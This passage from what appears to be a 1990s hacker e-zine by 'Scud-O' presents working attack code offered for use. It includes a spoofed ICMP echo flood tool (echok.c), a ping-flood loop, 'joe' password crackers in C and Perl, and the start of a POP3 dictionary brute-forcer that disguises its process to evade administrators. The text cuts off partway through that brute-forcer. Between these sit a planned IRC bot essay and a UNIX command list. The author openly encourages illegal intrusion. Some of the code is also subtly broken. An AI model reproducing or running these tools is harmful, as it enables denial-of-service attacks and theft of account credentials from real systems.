  774. undernet or another irc server has e-mailed them about you.
  775.  
  776. Anyway, below is some sample code that Keystroke had, and although he will
  777. be pissed that i am adding it here, i am, so tough shit Key! (heh) This code
  778. may also be the basis of my ICMP killer win95 program i will be developing
  779. during the coming months, ( wish me luck on porting this from UNIX to Win95)
  780.  
  781.        Basically tthe following code works, since UNIX systems will reply to
  782. ICMP requests continually, not realizing that it may be halting the system by
  783. replying to what the system thinks are simple ICMPs. Now adding an IP spoofer
  784. to this setup, only makes things better since the computer will time out while
  785. trying to get a reply from these ECHOs while new ECHOs are also hitting the
  786. system, thus totally killing the system.
  787.  
  788. -------------------------------------------
  789. /*
  790.  * echok.c
  791.  * ICMP_ECHO Killer
  792.  * 
  793.  * Author: Zakath    Credits:  LOTSA thanks to crisk
  794.  * Don't be fooled. Very little is my orig code.
  795.  * [03.13.96]
  796.  */
  797.  
  798. #define RESOLVE_QUIET
  799. #define IPHDRSIZE sizeof(struct iphdr)
  800. #define ICMPHDRSIZE sizeof(struct icmphdr)
  801.  
  802. #include <sys/types.h>
  803. #include <sys/socket.h>
  804. #include <stdio.h>
  805. #include <unistd.h>
  806. #include <stdlib.h>
  807. #include <string.h>
  808. #include <netdb.h>
  809.  
  810. #include <netinet/ip.h>
  811. #include <netinet/in.h>
  812. #include <netinet/ip_icmp.h>
  813.  
  814. #define ECHOK_VER "1.4"
  815.  
  816. /* GENERAL ROUTINES ------------------------------------------- */
  817.  
  818. void banner(void)
  819.     {
  820.     printf("\n                  * ICMP ECHO Killer [v%s] - by Zakath *", ECHOK_VER);
  821.        printf("\n               * Code based on works by Crisk & Mike Muuss *\n\n");
  822.     }
  823.     
  824. void usage(const char *progname)
  825.     {
  826.     printf("\nusage:\n  ");
  827.     printf("%s [-f <-n number>] [-s packet size] [-w wait] <spoof> <dest>\n\n",progname);
  828.     printf("\t-f          : enable flooding  (ping -f)\n");
  829.     printf("\t-n <number> : number of pings to send\n");
  830.     printf("\t-s <size>   : ICMP_ECHO Packet Size [Default is 64]\n");
  831.     printf("\t-w <time>   : Wait time between packets [Default is 100]\n");
  832.        printf("\t<spoof>     : address of fake ICMP packet sender\n");
  833.     printf("\t<dest>      : destination of the flood message\n");
  834.         printf("\n");
  835.     }
  836.  
  837. /* OPTION PARSING -------------------------------------------- */
  838.  
  839. unsigned char *dest_name;
  840. unsigned char *spoof_name = NULL;
  841. struct sockaddr_in destaddr, spoofaddr;
  842. unsigned long dest_addr;
  843. unsigned long spoof_addr;
  844. unsigned      pingsize, pingsleep, pingnmbr;
  845. char          flood = 0;
  846. int       x = 1;
  847.  
  848. /*
  849.  * in_cksum --
  850.  *  Checksum routine for Internet Protocol family headers (C Version)
  851.  */
  852. unsigned short in_cksum(addr, len)
  853.     u_short *addr;
  854.     int len;
  855. {
  856.     register int nleft = len;
  857.     register u_short *w = addr;
  858.     register int sum = 0;
  859.     u_short answer = 0;
  860.  
  861.     /*
  862.     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  863.     * sequential 16 bit words to it, and at the end, fold back all the
  864.     * carry bits from the top 16 bits into the lower 16 bits.
  865.     */
  866.     while (nleft > 1)  {
  867.        sum += *w++;
  868.        nleft -= 2;
  869.     }
  870.  
  871.     /* mop up an odd byte, if necessary */
  872.     if (nleft == 1) {
  873.        *(u_char *)(&answer) = *(u_char *)w ;
  874.        sum += answer;
  875.     }
  876.  
  877.     /* add back carry outs from top 16 bits to low 16 bits */
  878.     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
  879.     sum += (sum >> 16);         /* add carry */
  880.     answer = ~sum;              /* truncate to 16 bits */
  881.     return(answer);
  882. }
  883.  
  884.  
  885. /* Nice resolve func. by crisk */
  886. int resolve( const char *name, struct sockaddr_in *addr, int port )
  887.     {
  888.     struct hostent *host;
  889.     
  890.     /* clear everything in case I forget something */
  891.     bzero((char *)addr,sizeof(struct sockaddr_in));
  892.     
  893.     if (( host = gethostbyname(name) ) == NULL )  {
  894. #ifndef RESOLVE_QUIET
  895.        fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
  896.        perror("");
  897. #endif
  898.        return -1;
  899.     }
  900.      
  901.     addr->sin_family = host->h_addrtype;
  902.     memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
  903.     addr->sin_port = htons(port);
  904.     
  905.        return 0;
  906.     }
  907.  
  908. unsigned long addr_to_ulong(struct sockaddr_in *addr)
  909.     {
  910.     return addr->sin_addr.s_addr;
  911.     }
  912.  
  913.  
  914. int resolve_one(const char *name, unsigned long *addr, const char *desc)
  915.     {
  916.        struct sockaddr_in tempaddr;
  917.     if (resolve(name, &tempaddr,0) == -1) {
  918.        printf("error: can't resolve the %s.\n",desc);
  919.        return -1;
  920.     }
  921.           
  922.     *addr = tempaddr.sin_addr.s_addr;
  923.         return 0;
  924.     }
  925.  
  926. int resolve_all(const char *dest,
  927.         const char *spoof)
  928.     {
  929.        if (resolve_one(dest,&dest_addr,"dest address")) return -1;
  930.     if (spoof!=NULL) 
  931.       if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;
  932.     
  933.     spoofaddr.sin_addr.s_addr = spoof_addr;
  934.        spoofaddr.sin_family = AF_INET;
  935.     destaddr.sin_addr.s_addr = dest_addr;
  936.     destaddr.sin_family      = AF_INET;
  937.     }
  938.     
  939. void give_info(void)
  940.     {
  941.     printf("# target address          : %s (%s)\n",dest_name,inet_ntoa(dest_addr));
  942.     printf("# spoof-from address      : %s (%s)\n\n",spoof_name,inet_ntoa(spoof_addr));
  943.     if (pingnmbr) printf("# number of packets       : %u\n",(pingnmbr));
  944.     printf("# icmp echo packet size   : %u\n",(pingsize+36));
  945.        printf("# wait time between send  : %u\n\n", pingsleep);
  946.     }
  947.  
  948. int parse_args(int argc, char *argv[]) 
  949.     {
  950.        int opt;
  951.     
  952.     char *endptr;
  953.     
  954.     while ((opt=getopt(argc, argv, "fn:s:w:")) != -1)  {
  955.        switch(opt)  {
  956.          case 'f': flood = 1; break;
  957.          case 'n': pingnmbr = strtoul(optarg,&endptr,10);
  958.                  if (*endptr != '\0')  {
  959.                  printf("%s: Invalid Number '%s'.\n", argv[0], optarg);
  960.                return -1;
  961.                 }
  962.                break;
  963.          case 's': pingsize = strtoul(optarg,&endptr,10);
  964.                  if (*endptr != '\0')  {
  965.                  printf("%s: Bad Packet Size '%s'\n", argv[0], optarg);
  966.                  return -1;
  967.                 }
  968.                break;
  969.          case 'w': pingsleep = strtoul(optarg,&endptr,10);
  970.                  if (*endptr != '\0')  {
  971.                  printf("%s: Bad Wait Time '%s'\n", argv[0], optarg);
  972.                  return -1;
  973.                 }
  974.                break;
  975.          case '?':
  976.          case ':': return -1; break;
  977.        }
  978.       
  979.     }
  980.         
  981.     if (optind > argc-2)  {
  982.        printf("%s: missing parameters\n",argv[0]);
  983.        return -1;
  984.     }
  985.        
  986.        if (!pingsize)
  987.         pingsize = 28;
  988.        else
  989.         pingsize = pingsize - 36 ;
  990.  
  991.        if (!pingsleep)
  992.         pingsleep = 100;
  993.  
  994.     spoof_name = argv[optind++];
  995.     dest_name = argv[optind++];
  996.     
  997.     return 0;                     
  998.     }
  999.  
  1000. /*
  1001.  * icmp_echo_send()
  1002.  * builds and sends an ICMP unreachable packet. Since ICMP unreachable packets
  1003.  * contain the IP header + 64 bits of original datagram, we create a bogus
  1004.  * IP header and the first 64 bits of a TCP header (ports and syn). 
  1005.  *
  1006.  */
  1007.  
  1008.  inline int icmp_echo_send(int                socket, 
  1009.                unsigned long      spoof_addr,
  1010.                unsigned long      t_addr,
  1011.                unsigned           pingsize)
  1012.     {
  1013.     unsigned char packet[5122];
  1014.     struct iphdr   *ip;
  1015.     struct icmphdr *icmp;
  1016.     struct iphdr   *origip;
  1017.        unsigned char  *data;
  1018.  
  1019.        int i;
  1020.     
  1021.     ip = (struct iphdr *)packet;
  1022.     icmp = (struct icmphdr *)(packet+IPHDRSIZE);
  1023.     origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);
  1024.     data = (char *)(packet+pingsize+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);
  1025.     
  1026.     memset(packet, 0, 5122);
  1027.     
  1028. /*   ip->saddr    = spoof_addr; */
  1029.     ip->version  = 4;
  1030.     ip->ihl      = 5; 
  1031.     ip->ttl      = 255-random()%15;
  1032.     ip->protocol = IPPROTO_ICMP;
  1033.     ip->tot_len  = htons(pingsize + IPHDRSIZE + ICMPHDRSIZE + IPHDRSIZE + 8);
  1034.     
  1035.        bcopy((char *)&destaddr.sin_addr, &ip->daddr, sizeof(ip->daddr));
  1036.        bcopy((char *)&spoofaddr.sin_addr, &ip->saddr, sizeof(ip->saddr)); 
  1037.  
  1038.     ip->check    = in_cksum(packet,IPHDRSIZE);
  1039.     
  1040. /*        origip->saddr    = t_addr;   this is the 'original' header. */
  1041.     origip->version  = 4;
  1042.     origip->ihl      = 5;
  1043.     origip->ttl      = ip->ttl - random()%15;
  1044.     origip->protocol = IPPROTO_TCP; 
  1045.     origip->tot_len  = IPHDRSIZE + 30; 
  1046.     origip->id       = random()%69;
  1047.     
  1048.        bcopy((char *)&destaddr.sin_addr, &origip->saddr, sizeof(origip->saddr));
  1049.  
  1050.         origip->check = in_cksum(origip,IPHDRSIZE);
  1051.     
  1052.     *((unsigned int *)data)          = htons(pingsize);
  1053.  
  1054.     /* 'original IP header + 64 bits (of bogus TCP header)' made. */
  1055.     
  1056.     icmp->type = 8; /* should be 3 */
  1057.     icmp->code = 0;
  1058.     
  1059.     icmp->checksum = in_cksum(icmp,pingsize+ICMPHDRSIZE+IPHDRSIZE+8);
  1060.  
  1061.     return sendto(socket,packet,pingsize+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8,0,
  1062.              (struct sockaddr *)&destaddr,sizeof(struct sockaddr)); 
  1063.     
  1064.     /* ICMP packet is now over the net. */
  1065.     
  1066.     }
  1067.  
  1068. /* MAIN ------------------------------------------------------ */
  1069.  
  1070. void main(int argc, char *argv[])
  1071.     {
  1072.        int s, i;
  1073.        int floodloop;
  1074.     
  1075.         banner();
  1076.        
  1077.     if (parse_args(argc,argv)) 
  1078.       {  
  1079.         usage(argv[0]); 
  1080.         return;
  1081.       }
  1082.     
  1083.     resolve_all(dest_name, spoof_name);
  1084.     give_info();
  1085.         
  1086.         s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  1087.  
  1088. #ifdef IP_HDRINCL
  1089.     fprintf(stderr,"We have IP_HDRINCL! =] \n\n");
  1090.     if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
  1091.         {
  1092.           perror("setsockopt IP_HDRINCL");
  1093.           exit(1);
  1094.         }
  1095. #else
  1096.     fprintf(stderr,"We don't have IP_HDRINCL! =[\n\n");
  1097. #endif
  1098.  
  1099.  
  1100.     
  1101.        if (!flood)
  1102.       {
  1103.         if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)
  1104.         {
  1105.            printf("%s: error sending ping packet\n",argv[0]); perror(""); return;
  1106.         }
  1107.       }
  1108.     else
  1109.       {
  1110.            floodloop = 0;
  1111.            if ( pingnmbr && (pingnmbr > 0) )
  1112.            {
  1113.             printf("flooding... packet limit set.\n");
  1114.             for (i=0;i<pingnmbr;i++)
  1115.           {
  1116.          if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1) 
  1117.             {
  1118.             printf("%s: error sending packet\n",argv[0]); perror(""); return; 
  1119.             }
  1120.          usleep((pingsleep*1000));               
  1121.  
  1122.             if (!(floodloop = (floodloop+1)%25)) 
  1123.           { fprintf(stdout,"."); fflush(stdout); 
  1124.             }
  1125.         
  1126.           }
  1127.             printf("flooding completed - %u packets sent.\n", pingnmbr);
  1128.            }
  1129.            else {
  1130.             printf("flooding. each dot equals 25 packets.\n");
  1131.             for (i=0;i<1;i)
  1132.           {
  1133.          if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1) 
  1134.             {
  1135.             printf("%s: error sending packet\n",argv[0]); perror(""); return; 
  1136.             }
  1137.          usleep(900);                  
  1138.  
  1139.             if (!(floodloop = (floodloop+1)%25)) 
  1140.           { fprintf(stdout,"."); fflush(stdout); 
  1141.             }
  1142.         
  1143.           }
  1144.            }
  1145.  
  1146.       }
  1147.     }
  1148.  
  1149. -----------------------
  1150. ping floods
  1151. -----------------------
  1152.  
  1153. Ping floods are very similar to ICMP_ECHO floods, in that they both send
  1154. thousands of replies that the host you are attacking will reply to, not
  1155. realizing that repling to the ping can be bogging down system resources.
  1156. Probably one of the bets ways to run these is with a IP spoofer, so the
  1157. computer takes more time trying to reply to a dead ip, and it also will
  1158. keep your sysadmin yelling at you in case the attacked host sysdamin
  1159. traces the connection.
  1160.  
  1161. from the command prompt you could use:
  1162.  
  1163. ping -s 4000 host &
  1164.  
  1165. * if you are running linux, then just use the -f command which sends out pings
  1166. as fast as possible, thus bogging the remote system.
  1167.  
  1168. Or you could code this simple C program:
  1169.  
  1170. /* pingkill.c - by Scud-O */
  1171. #include <stdio.h>
  1172. #include <stdlib.h>
  1173.  
  1174. void main()
  1175. {
  1176.        while(1)
  1177.        {
  1178.              system (ping -s 4000 host);
  1179.         sleep(3);
  1180.     }
  1181. }
  1182.  
  1183. You can also use a for loop or a counter if you do not want this program to
  1184. run forever.
  1185.  
  1186. -----------------------------------
  1187. PLEASE NOTE: for any of these attacks it is advisable to run them in the
  1188. background, since these attacks can take some time, especially if the system
  1189. is quite large. ( if you dont know how to run stuff in the background, go
  1190. hang yourself ( actually just add a & at the end of a command, and if you want
  1191. the command to still run after you log off, do a nohup command & ) )
  1192.  
  1193. -------------------------------------------------------------------
  1194. * Thanks to daemon9 for his indepth discussion of TCP/SYN flooding in phrack
  1195. 48.
  1196. * Thanks to Keystroke for the code, and to who ever wrote it.
  1197.  
  1198. ----------------------------
  1199. * If you need ANY help to fight off these attacks, just e-mail me and I will
  1200. be glad to help you. - Scud-O ( FoxMulder@worldnet.att.net ) 
  1201.                  
  1202. ___________________________________________________________________
  1203.  
  1204.                        [The 'g0d' Project]
  1205.                 General Info, Techniques, Etc by Scud-O
  1206.                 .......................................
  1207.                 The 'g0d' Project is <c> HBS 1996,1997
  1208.                        !ALL RIGHTS RESERVED!
  1209.                 .......................................
  1210.  
  1211.  I. Introduction
  1212.        The first question you must be having about this little project is...
  1213. But Aren't you an athiest? Well, yes, but this project was named after god
  1214. because I find it quite humorous, and the fact that it is easy to come up with
  1215. good quotes for 'g0d' to say.
  1216.  
  1217.  II. What the hell is 'g0d'?
  1218.        Well, to put it simply, 'g0d' is what will be developed into an AI Bot
  1219. for IRC. Why? Well, because it seems like I cool idea. I have heard of another
  1220. bot called 'mama' written by a Peter Sjostrom, and is on some irc servers
  1221. #amiga, but I can not confirm this.
  1222.  
  1223.  III. How the hell did you come up with this idea?
  1224.        Well, one night when I was ENCREDIBLY bored on IRC, I changed my nick
  1225. to g0d and pretended to be the AI Bot. It was quite fun, and many fools
  1226. believed me. So after that night I started to think, hell maybe I COULD code a
  1227. simple AI bot and then keep extending its powers.
  1228.  
  1229.   IV. When is 'g0d' going online?
  1230.        Well, currently I am debating whether to code g0d in C or HEAVILY
  1231. modify an eggdrop to my needs. I WAS going to add g0d to #phreak a while back,
  1232. but g0d was to run on tombin's server, and well he fucked up my account, so
  1233. to date ( 2/22/97 ) g0d in his eggdrop form is not online. But I predict that
  1234. I can get a VERY simple version of 'g0d' up by early June, or sooner, it all
  1235. depends on my work load and if I EVER get some sleep since lately I have been
  1236. becoming an insomiac and not been sleeping.
  1237.  
  1238.  V. How the hell do you expect this to work?
  1239.        Well, really it is very simple. The will be 2 main parts to this bot,
  1240. The actual bot which communicates to the servers manages its connection,
  1241. writes and reads text, etc, And the actual AI part of the bot. The AI will
  1242. mainly consist of a string parser, which will tear up users words, and then
  1243. if they match any of the bots files, it will reply. g0d will hopefully also
  1244. watch over quit messages and identify netspilts, offer files, and of course
  1245. offer those ever so funny quotes when a user on the list joins the channel and
  1246. then op them.
  1247.  
  1248.  VI. g0d v0.11
  1249.        g0d version 0.11 should be up soon. This version will have only VERY
  1250. limited AI, almost none really, and is to be based on |\|\cFill's bot example
  1251. in THTJ 5. So if you see g0d on #phreak say hello and see what he does. heh.
  1252.  
  1253.        
  1254.                 .......................................
  1255.  live in fear, g0d is coming to punish the sinners and reward the disciples!
  1256.                 .......................................
  1257.  
  1258. Watch for this and other bots coming soon from HBS!
  1259.  
  1260.  Reload           - A very basic bot that basically just visits and revisits
  1261.                 the same web page or pages over and over (helps with the
  1262.                 web counters no?)
  1263.  
  1264.  Black Widow      - Site indexer or spider (similar to the ones that servers
  1265.                 like Lycos and others) with a possible feature that
  1266.                 'rates' web pages using a VERY basic parser like in 'g0d'
  1267.  
  1268.  Newman           - Just like the character from 'Seinfeld' this little bot
  1269.                 will play havoc on users mail and possibly news ( random
  1270.                 news cancels? random mail floods? what will happen next? )
  1271.  
  1272.  
  1273. ___________________________________________________________________
  1274.  
  1275.             NOAOL.CGI will be here next month!
  1276. ___________________________________________________________________
  1277. RTFM : UNIX Basics 101
  1278.  
  1279.        Last month I wanted to write my own beginner's guide to UNIX, but
  1280. with deadlines and failing grades, it was not to be. So instead I had to add
  1281. a lame old lod text. Anyway, here it is, MY very own guide to UNIX, and basic
  1282. UNIX crackin. Enjoy.
  1283.  
  1284.                     [Basic UNIX Info And Cracks]
  1285.                             by Scud-O
  1286.  
  1287.        If you didnt know, UNIX was first created at AT&T Bell Labs in 1969
  1288. after the wake of the failed Multix project. Since those days, AT&T has
  1289. greatly improved it, The University of California at Berkley has made their
  1290. own version ( BSD), which is also quite popular, Sun makes a version, and of
  1291. course there is the ever popular linux for the PCs. During this time, UNIX
  1292. took over the Internet, and is the domiant OS in the world. Sounds like it
  1293. would be extremely useful to know for both hacking, and future jobs, doesnt
  1294. it? Well you are in luck... this file is here to help.
  1295.  
  1296. Basic UNIX Commands:
  1297.        Many UNIX commands are fairly simple, ( while some are very complex,
  1298. you will probably not use them or encounter them much, since they are used to
  1299. manipulate files, etc.) and if you know DOS, many of the commands are similar.
  1300.  
  1301. First: A basic run down of commands:
  1302.  
  1303.        start bourne shell                      sh
  1304.        start c shell                           csh
  1305.        start korn shell                        ksh
  1306.        call up a unix system (modem)           cu
  1307.        chat with a user                        talk
  1308.        clear screen                            clear
  1309.        run command at a specific time          at
  1310.        run a series of commands                batch
  1311.        compile c programs                      cc
  1312.        compress file                           compress
  1313.        uncompress file                         uncompress
  1314.        copy a file                             cp
  1315.        count words in a file                   wc
  1316.        create new text file                    cat, vi, ed
  1317.        change current directory                cd
  1318.        stop a process                          kill
  1319.        date + time                             date
  1320.        delete file                             rm
  1321.        make directory                          mkdir
  1322.        disk usage by dir                       du
  1323.        dir list                                ls
  1324.        remove a dir                            rmdir
  1325.        print working directory                 pwd
  1326.        display free or total space             df
  1327.        display file                            cat,page,more
  1328.        edit file                               vi, ed
  1329.        email                                   mail, elm, pine
  1330.        notify on email                         notify
  1331.        encrypt file                            crypt
  1332.        display/set environment                 env
  1333.        exit                                    exit
  1334.        find file                               find
  1335.        change ownership                        chown
  1336.        change file permissions                 chmod
  1337.        move file                               mv
  1338.        save a log of current session           script
  1339.        login as another user                   su
  1340.        remote host login                       rlogin, telnet
  1341.        login system                            login
  1342.        run commands after you logg off         nohup
  1343.        run commands in background              add '&' after program
  1344.        run commands a low priority             nice
  1345.        send msg to all users                   wall
  1346.        turn on/off talk                        mesg
  1347.        system news                             news
  1348.        show machines on network                ruptime
  1349.        set password                            passwd
  1350.        pause before command                    sleep
  1351.        print                                   lp
  1352.        show processes                          ps
  1353.        link files                              ln
  1354.        start remont shell on a system          rsh
  1355.        check spelling                          spell
  1356.        info on unix system                     uname
  1357.        info on user                            who
  1358.        info on user                            finger
  1359.        write messages to user                  write
  1360.        help                                    man
  1361.  
  1362. ----------
  1363.        These are just some of the few commands a UNIX systems provides. There
  1364. are of course the usual Internet commands also:
  1365.  
  1366.        telnet                  remote system login
  1367.        ftp                     file transfers
  1368.        mail                    email
  1369.        irc                     irc!
  1370.        lynx                    world wide web
  1371.        news                    newsgroups
  1372.              etc...
  1373.  
  1374. The commands you will use the most:
  1375.  
  1376.        copy file                       cp
  1377.        create text file                cat, vi, ed
  1378.        change current directory        cd
  1379.        delete file                     rm
  1380.        dir list                        ls (use ls -l for more info)
  1381.        make dir                        mkdir
  1382.        display a file                  cat,more,page
  1383.        edit files                      vi, ed
  1384.        show processes                  ps
  1385.        help                            man
  1386.  
  1387. -----------------------------------
  1388. These commands will get you though about 90% of common day to day UNIX life.
  1389. I recommend that you (a) Buy a simple book on UNIX, and (b) Get an ISP with
  1390. shell accounts, or use the shell that your ISP offers. Don't try to hack a
  1391. shell just yet, pay for one until you are fairly well used to unix, and then
  1392. work on cracking accounts. evilempire.org will be offering shells when it
  1393. opens, L0pht offers them, and most ISPs will sell you to you.
  1394.  
  1395. [Basic Cracks]
  1396.        If you look back at issue 7 there is an article called Joes. A Joe is
  1397. a user that uses his userid as his password. I have included the C code from
  1398. that article to make your life simple.
  1399.  
  1400.  
  1401. /**********************************************************************
  1402. * joetest.c
  1403. *
  1404. * a -SIMPLE- password cracker that cracks account with the same username and
  1405. * password. (a 'joe')
  1406. *
  1407. * NOTE: If your system has shadowed passwords, then this must be run as root!
  1408. *
  1409. * Written for The HAVOC Technical Journal issue 7 by Scud-O
  1410. * http://www.geocities.com/SiliconValley/8805/
  1411. ***********************************************************************/
  1412. #include <stdio.h>
  1413. #include <pwd.h>
  1414.  
  1415. int main(int argc, char **argv)
  1416. {
  1417.        struct passwd *pw;
  1418.  
  1419.        while(pw=getpwent() )
  1420.        {
  1421.              char *crypt();
  1422.              char *result;
  1423.  
  1424.              result = crypt(pw->pw_name,pw->pw_passwd);
  1425.  
  1426.              if(!strcmp(result,pw->pw_name,pw->pw_passwd))
  1427.              {
  1428.                     printf(" %s is a joe\n", pw->pw_name);
  1429.              }
  1430.        }
  1431.        exit(0);
  1432. }
  1433.  
  1434.        I have included this file, since most systems have a c compiler.
  1435. Just use: cc joetest.c to compile, and the run it. On may small systems you
  1436. may turn up nothing, and on larger systems you should probably find a few,
  1437. but you never know!
  1438.        I also have 2 perl scripts that do the same thing, but one has a few
  1439. added features. I gave you the C code, since not all systems have perl, due
  1440. to security holes.
  1441.  
  1442. #!/usr/local/bin/perl
  1443. # joetest for perl
  1444. while (($name, $passwd) = getpwent) {
  1445.        print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);
  1446. }
  1447.  
  1448. This code is for perl 5 only, and it includes some more features:
  1449.  
  1450. #!/usr/local/bin/perl
  1451. # joetest for perl 5 ( super joetest )
  1452. while (($name, $passwd) = getpwent) {
  1453.        print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);
  1454.        print "$name has no password\n" if !$passwd;
  1455.        print "$name is a JOE\n" if (crypt(uc($name),$passwd) eq $passwd);
  1456.        print "$name is a Joe\n" if (crypt(ucfirst($name),$passwd) eq $passwd);
  1457.        print "$name is a eoj\n" if (crypt(scalar reverse $name,$passwd) eq $passwd);
  1458. }
  1459.  
  1460. ----------------------------------------------
  1461. Just so you know:
  1462.        The passwords on a system are kept in the file /etc/passwd .
  1463. On some systems, the file is shadowed, so only the admin can see the passwords
  1464. Passwords are also encrypted using crypt, which is a fairly strong one way
  1465. encryptor.Here is what a passwd file may look like:
  1466.  
  1467. root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh
  1468. nobody:*Nologin:65534:65534:anonymous NFS user:/:
  1469. nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
  1470. daemon:*:1:1:system background account:/:
  1471. bin:*:3:4:system librarian account:/bin:
  1472. .
  1473. .
  1474. .
  1475. rest of the lines have been deleted to save space...
  1476. .
  1477. .
  1478. ------------------------------------------------------
  1479.  
  1480. These programs should all give you a quick into to hacking, and provide some
  1481. fun until next month.
  1482.  
  1483.     There is still much to cover, but this issue is over due, and I need
  1484. to get it out, so just wait until next month when we will have more great info 
  1485. for you all.
  1486.  
  1487. ------------------
  1488. For the end of this month, I know that you will want to try to do some REAL
  1489. hacking now that you know some UNIX, and not just play around on some shell
  1490. account you are paying for, so I have included this c program that with a
  1491. host name, a password file, and a dictionary, it will find POP ( post office
  1492. protocol -- the commonly used mail protocol) passwords, which many time,
  1493. thanks to users stupidity, are the same as the full account passwords.
  1494.        Anyway, have fun, to compile it: cc pop3hack.c , should do very well
  1495. for you. Also, remember from here on out, you are actually doing something
  1496. illegal, so stop and think about this for a minute.... are you ready? are
  1497. you gunna hack? If you dont say 'hell yes' prepare to be smacked!
  1498.  
  1499. -- pop3hack.c --
  1500.  
  1501. #include <stdio.h>
  1502. #include <string.h> 
  1503. #include <signal.h> 
  1504. #include <unistd.h> 
  1505. #include <sys/param.h> 
  1506. #include <sys/socket.h> 
  1507. #include <netinet/in.h> 
  1508. #include <netdb.h> 
  1509. #include <stdarg.h> 
  1510.  
  1511. /* First, define the POP-3 port - almost always 110 */ 
  1512. #define POP3_PORT               110 
  1513.  
  1514. /* What we want our program to be masked as, so nosy sysadmins dont kill us */ 
  1515. #define MASKAS                  "vi" 
  1516.  
  1517. /* Repeat connect or not - remember, logs still report a connection, so 
  1518. you might want to set this to 0. If set to 0, it will hack until it finds 
  1519. 1 user/password then exit. If set to 1, it will reconnect and try more 
  1520. user/passwords (until it runs out of usernames) */ 
  1521. #define RECONNECT               0 
  1522.  
  1523. /* The function prototypes */ 
  1524. void nuke_string(char *); 
  1525. int pop_connect(char *); 
  1526. int pop_guess(char *, char *); 
  1527. char *getanswer(char *); 
  1528. char *getanswer_(char *); 
  1529. void swallow_welcome(void); 
  1530. void hackity_hack(void); 
  1531.  
  1532. int popfd; 
  1533. FILE *popfp; 
  1534.  
  1535. FILE *userfile; 
  1536. FILE *dictfile; 
  1537.  
  1538. char host[255]; 
  1539. char dict[255]; 
  1540. char user[255]; 
  1541.  
  1542. main(int argc, char **argv) 
  1543.    if(argc < 4) 
  1544.    { 
  1545.      /* invalid syntax, display syntax and exit */    
  1546.      printf("Syntax: %s host userfile dictfile\n", argv[0]); 
  1547.      exit(0); 
  1548.    }    
  1549.     
  1550.    /* Validate that the host exists */ 
  1551.    if(pop_connect(argv[1]) == -1) 
  1552.    { 
  1553.      /* Error */ 
  1554.      printf("Error connecting to host %s\n", argv[1]); 
  1555.      exit(0); 
  1556.    } 
  1557.    printf("Connected to: %s\n\n", argv[1]); 
  1558.     
  1559.    /* Check for the existance of the user file */ 
  1560.    userfile=fopen(argv[2], "rt"); 
  1561.    if(userfile==NULL) 
  1562.    { 
  1563.      /* Error */ 
  1564.      printf("Error opening userfile %s\n", argv[2]); 
  1565.      exit(0); 
  1566.    } 
  1567.    fclose(userfile); 
  1568.     
  1569.    /* Checking for the existance of dict file */ 
  1570.    dictfile=fopen(argv[3], "rt"); 
  1571.    if(dictfile==NULL) 
  1572.    { 
  1573.      /* Error */ 
  1574.      printf("Error opening dictfile %s\n", argv[3]); 
  1575.      exit(0); 
  1576.    } 
  1577.    fclose(dictfile); 
  1578.     
  1579.    /* Copy important arguments to variables */ 
  1580.    strcpy(host, argv[1]); 
  1581.    strcpy(user, argv[2]); 
  1582.    strcpy(dict, argv[3]); 
  1583.              
  1584.    nuke_string(argv[0]); 
  1585.    nuke_string(argv[1]); 
  1586.    nuke_string(argv[2]); 
  1587.    nuke_string(argv[3]);    
  1588.    strcpy(argv[0], MASKAS); 
  1589.  
  1590.    swallow_welcome();    
  1591.    hackity_hack(); 
  1592.  
  1593.       
  1594. void nuke_string(char *targetstring) 
  1595.    char *mystring=targetstring; 
  1596.     
  1597.    while(*targetstring != '\0') 
  1598.    { 
  1599.      *targetstring=' '; 
  1600.      targetstring++; 
  1601.    } 
  1602.    *mystring='\0'; 
  1603.  
  1604.  
  1605. int pop_connect(char *pophost) 
  1606.    int popsocket; 
  1607.    struct sockaddr_in sin; 
  1608.    struct hostent *hp; 
  1609.       
  1610.    hp=gethostbyname(pophost); 
  1611.    if(hp==NULL) return -1; 
  1612.     
  1613.    bzero((char *)&sin,sizeof(sin)); 
  1614.    bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); 
  1615.    sin.sin_family=hp->h_addrtype; 
  1616.    sin.sin_port=htons(POP3_PORT); 
  1617.    popsocket=socket(AF_INET, SOCK_STREAM, 0); 
  1618.    if(popsocket==-1) return -1; 
  1619.    if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1; 
  1620.    popfd=popsocket; 
  1621.    return popsocket;    
  1622.  
  1623.  
  1624. int pop_guess(char *username, char *password) 
  1625.    char buff[512]; 
  1626.     
  1627.    sprintf(buff, "USER %s\n", username); 
  1628.    send(popfd, buff, strlen(buff), 0);    
  1629.    getanswer(buff); 
  1630.       
  1631.    sprintf(buff, "PASS %s\n", password); 
  1632.    send(popfd, buff, strlen(buff), 0); 
  1633.    getanswer(buff); 
  1634.    if(strstr(buff, "+OK") != NULL) 
  1635.    { 
  1636.      printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password); 
  1637.      return 0; 
  1638.    } 
  1639.    else return -1; 
  1640.  
  1641. char *getanswer(char *buff) 
  1642.    for(;;) 
  1643.    { 
  1644.      getanswer_(buff); 
  1645.      if(strstr(buff, "+OK") != NULL) return buff; 
  1646.      if(strstr(buff, "-ERR") != NULL) return buff; 
  1647.    } 
  1648.  
  1649. char *getanswer_(char *buff) 
  1650.    int ch; 
  1651.    char *in=buff; 
  1652.     
  1653.    for(;;) 
  1654.    { 
  1655.      ch=getc(popfp); 
  1656.      if(ch == '\r'); 
  1657.      if(ch == '\n') 
  1658.      { 
